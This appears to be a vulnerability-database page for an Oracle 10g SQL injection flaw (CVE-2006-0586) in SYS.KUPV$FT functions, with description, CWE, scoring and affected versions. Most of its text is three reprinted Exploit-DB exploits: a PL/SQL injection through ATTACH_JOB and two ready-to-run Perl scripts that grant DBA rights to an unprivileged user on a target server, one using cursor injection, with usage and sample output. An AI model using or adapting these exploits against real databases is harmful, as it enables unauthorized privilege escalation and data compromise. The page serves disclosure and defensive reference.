CVE-2006-0586 : Detail

CVE-2006-0586

SQL Injection
A03-Injection
85.28%V3
Network
2006-02-08
00h00 +00:00
2018-10-19
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple SQL injection vulnerabilities in Oracle 10g Release 1 before CPU Jan 2006 allow remote attackers to execute arbitrary SQL commands via multiple parameters in (1) ATTACH_JOB, (2) HAS_PRIVS, and (3) OPEN_JOB functions in the SYS.KUPV$FT package; and (4) UPDATE_JOB, (5) ACTIVE_JOB, (6) ATTACH_POSSIBLE, (7) ATTACH_TO_JOB, (8) CREATE_NEW_JOB, (9) DELETE_JOB, (10) DELETE_MASTER_TABLE, (11) DETACH_JOB, (12) GET_JOB_INFO, (13) GET_JOB_QUEUES, (14) GET_SOLE_JOBNAME, (15) MASTER_TBL_LOCK, and (16) VALID_HANDLE functions in the SYS.KUPV$FT_INT package. NOTE: due to the lack of relevant details from the Oracle advisory, a separate CVE is being created since it cannot be conclusively proven that these issues has been addressed by Oracle. It is unclear which, if any, Oracle Vuln# identifiers apply to these issues.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 3179

Publication date : 2007-01-22 23h00 +00:00
Author : Joxean Koret
EDB Verified : Yes

/** * Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006 * Joxean Koret <[email protected]> * Privileges needed: * * - EXECUTE_CATALOG_ROLE * - CREATE PROCEDURE * */ select * from user_role_privs ; CREATE OR REPLACE FUNCTION F1 RETURN NUMBER AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO TEST'; COMMIT; RETURN(1); END; / DECLARE USER_NAME VARCHAR2(200); JOB_NAME VARCHAR2(200); NEW_JOB BOOLEAN; v_Return NUMBER; BEGIN USER_NAME := 'OWNER'; JOB_NAME := ''' OR ' || USER || '.f1() = 1--'; v_Return := SYS.KUPV$FT.ATTACH_JOB( USER_NAME => USER_NAME, JOB_NAME => JOB_NAME, NEW_JOB => NEW_JOB ); END; / // milw0rm.com [2007-01-23]
Exploit Database EDB-ID : 3359

Publication date : 2007-02-21 23h00 +00:00
Author : bunker
EDB Verified : Yes

#!/usr/bin/perl # # Remote Oracle KUPV$FT.ATTACH_JOB exploit (10g) # # Grant or revoke dba permission to unprivileged user # # Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" # # REF: https://www.securityfocus.com/bid/16294 # # AUTHOR: Andrea "bunker" Purificato # http://rawlab.mindcreations.com # # DATE: Copyright 2007 - Thu Feb 22 17:18:55 CET 2007 # # Oracle InstantClient (basic + sdk) required for DBD::Oracle # # # bunker@fin:~$ perl kupv-ft_attach_job.pl -h localhost -s test -u bunker -p **** -r # [-] Wait... # [-] Revoking DBA from BUNKER... # DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupv-ft_attach_job.pl line 61. # [-] Done! # # bunker@fin:~$ perl kupv-ft_attach_job.pl -h localhost -s test -u bunker -p **** -g # [-] Wait... # [-] Creating evil function... # [-] Go ...(don't worry about error)! # DBD::Oracle::st execute failed: ORA-31626: job does not exist # ORA-06512: at "SYS.DBMS_SYS_ERROR", line 79 # ORA-06512: at "SYS.KUPV$FT", line 330 # ORA-31638: cannot attach to job ' AND 0=BUNKER.own-- for user # ORA-31632: master table ".' AND 0=BUNKER.own--" not found, invalid, or inaccessible # ORA-00942: table or view does not exist # ORA-06512: at line 6 (DBD ERROR: OCIStmtExecute) [for Statement " # DECLARE # J BOOLEAN; # R NUMBER; # BEGIN # R:=SYS.KUPV$FT.ATTACH_JOB('',''' AND 0=BUNKER.own--',J); # END; # "] at kupv-ft_attach_job.pl line 87. # [-] YOU GOT THE POWAH!! # # bunker@fin:~$ perl kupv-ft_attach_job.pl -h localhost -s test -u bunker -p **** -r # [-] Wait... # [-] Revoking DBA from BUNKER... # [-] Done! # use warnings; use strict; use DBI; use Getopt::Std; use vars qw/ %opt /; sub usage { print <<"USAGE"; Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>] Options: -h <host> target server address -s <sid> target sid name -u <user> user -p <passwd> password -g|-r (g)rant dba to user | (r)evoke dba from user [-P <port> Oracle port] USAGE exit 0 } my $opt_string = 'h:s:u:p:grP:'; getopts($opt_string, \%opt) or &usage; &usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); &usage if ( !$opt{g} and !$opt{r} ); my $user = uc $opt{u}; my $dbh = undef; if ($opt{P}) { $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; } else { $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; } my $sqlcmd = "GRANT DBA TO $user"; print "[-] Wait...\n"; if ($opt{r}) { print "[-] Revoking DBA from $user...\n"; $sqlcmd = "REVOKE DBA FROM $user"; $dbh->do( $sqlcmd ); print "[-] Done!\n"; $dbh->disconnect; exit; } print "[-] Creating evil function...\n"; $dbh->do( qq{ CREATE OR REPLACE FUNCTION OWN RETURN NUMBER AUTHID CURRENT_USER AS PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE '$sqlcmd'; COMMIT; RETURN(0); END; } ); print "[-] Go ...(don't worry about errors)!\n"; my $sth = $dbh->prepare( qq{ DECLARE J BOOLEAN; R NUMBER; BEGIN R:=SYS.KUPV\$FT.ATTACH_JOB('',''' AND 0=$user.own--',J); END; }); $sth->execute; $sth->finish; print "[-] YOU GOT THE POWAH!!\n"; $dbh->disconnect; exit; # milw0rm.com [2007-02-22]
Exploit Database EDB-ID : 3376

Publication date : 2007-02-25 23h00 +00:00
Author : bunker
EDB Verified : Yes

#!/usr/bin/perl # # Remote Oracle KUPV$FT.ATTACH_JOB exploit (10g) # - Version 2 - New "evil cursor injection" tip! # - No "create procedure" privileg needed! # - See: http://www.databasesecurity.com/ (Cursor Injection) # # Grant or revoke dba permission to unprivileged user # # Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" # # REF: https://www.securityfocus.com/bid/16294 # # AUTHOR: Andrea "bunker" Purificato # http://rawlab.mindcreations.com # # DATE: Copyright 2007 - Thu Feb 26 17:18:55 CET 2007 # # Oracle InstantClient (basic + sdk) required for DBD::Oracle # # bunker@fin:~$ perl kupv-ft_attach_jobV2.pl -h localhost -s test -u bunker -p **** -r # [-] Wait... # [-] Revoking DBA from BUNKER... # DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupv-ft_attach_jobV2.pl line 68. # [-] Done! # # bunker@fin:~$ perl kupv-ft_attach_jobV2.pl -h localhost -s test -u bunker -p **** -g # [-] Wait... # [-] Creating evil cursor... # Cursor: 2 # [-] Go ...(don't worry about errors)! # DBD::Oracle::st execute failed: ORA-31626: job does not exist # ORA-06512: at "SYS.DBMS_SYS_ERROR", line 79 # ORA-06512: at "SYS.KUPV$FT", line 330 # ORA-31638: cannot attach to job ' AND 0=dbms_sql.execute(2)-- for user # ORA-31632: master table ".' AND 0=dbms_sql.execute(2)--" not found, invalid, or inaccessible # ORA-00942: table or view does not exist # ORA-06512: at line 5 (DBD ERROR: OCIStmtExecute) [for Statement " # DECLARE # J BOOLEAN; R NUMBER; # BEGIN # R:=SYS.KUPV$FT.ATTACH_JOB('',''' AND 0=dbms_sql.execute(2)--',J); # END; # "] at kupv-ft_attach_jobV2.pl line 100. # [-] YOU GOT THE POWAH!! # # bunker@fin:~$ perl kupv-ft_attach_jobV2.pl -h localhost -s test -u bunker -p **** -r # [-] Wait... # [-] Revoking DBA from BUNKER... # [-] Done! # use warnings; use strict; use DBI; use Getopt::Std; use vars qw/ %opt /; sub usage { print <<"USAGE"; Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>] Options: -h <host> target server address -s <sid> target sid name -u <user> user -p <passwd> password -g|-r (g)rant dba to user | (r)evoke dba from user [-P <port> Oracle port] USAGE exit 0 } my $opt_string = 'h:s:u:p:grP:'; getopts($opt_string, \%opt) or &usage; &usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); &usage if ( !$opt{g} and !$opt{r} ); my $user = uc $opt{u}; my $dbh = undef; if ($opt{P}) { $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; } else { $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; } my $sqlcmd = "GRANT DBA TO $user"; print "[-] Wait...\n"; $dbh->func( 1000000, 'dbms_output_enable' ); if ($opt{r}) { print "[-] Revoking DBA from $user...\n"; $sqlcmd = "REVOKE DBA FROM $user"; $dbh->do( $sqlcmd ); print "[-] Done!\n"; $dbh->disconnect; exit; } print "[-] Creating evil cursor...\n"; my $sth = $dbh->prepare(qq{ DECLARE MYC NUMBER; BEGIN MYC := DBMS_SQL.OPEN_CURSOR; DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0); DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC); END; } ); $sth->execute; my $cursor = undef; while (my $line = $dbh->func( 'dbms_output_get' )) { print "$line\n"; if ($line =~ /^Cursor: (\d)/) {$cursor = $1;} } $sth->finish; print "[-] Go ...(don't worry about errors)!\n"; $sth = $dbh->prepare(qq{ DECLARE J BOOLEAN; R NUMBER; BEGIN R:=SYS.KUPV\$FT.ATTACH_JOB('',''' AND 0=dbms_sql.execute($cursor)--',J); END; }); $sth->execute; $sth->finish; print "[-] YOU GOT THE POWAH!!\n"; $dbh->disconnect; exit; # milw0rm.com [2007-02-26]

Products Mentioned

Configuraton 0

Oracle>>Application_server >> Version 10.1.0.2

Oracle>>Application_server >> Version 10.1.0.3

Oracle>>Application_server >> Version 10.1.0.3.1

Oracle>>Application_server >> Version 10.1.0.4

Oracle>>Application_server >> Version 10.1.2

Oracle>>Application_server >> Version 10.1.2.0.1

Oracle>>Application_server >> Version 10.1.2.0.2

Oracle>>Application_server >> Version 10.1.2.1.0

Oracle>>Oracle10g >> Version enterprise_10.1.0.2

    Oracle>>Oracle10g >> Version enterprise_10.1.0.3

      Oracle>>Oracle10g >> Version enterprise_10.1.0.3.1

        Oracle>>Oracle10g >> Version enterprise_10.1.0.4

          Oracle>>Oracle10g >> Version personal_10.1.0.2

            Oracle>>Oracle10g >> Version personal_10.1.0.3

              Oracle>>Oracle10g >> Version personal_10.1.0.4

                Oracle>>Oracle10g >> Version personal_10.10.3.1

                  Oracle>>Oracle10g >> Version standard_10.1.0.2

                    Oracle>>Oracle10g >> Version standard_10.1.0.3

                      Oracle>>Oracle10g >> Version standard_10.1.0.3.1

                        Oracle>>Oracle10g >> Version standard_10.1.0.4

                          Oracle>>Oracle10g >> Version standard_10.1.0.4.2

                            Oracle>>Oracle10g >> Version standard_10.1.0.5

                              References

                              http://www.osvdb.org/22840
                              Tags : vdb-entry, x_refsource_OSVDB
                              http://www.osvdb.org/22839
                              Tags : vdb-entry, x_refsource_OSVDB
                              http://www.securityfocus.com/bid/16294
                              Tags : vdb-entry, x_refsource_BID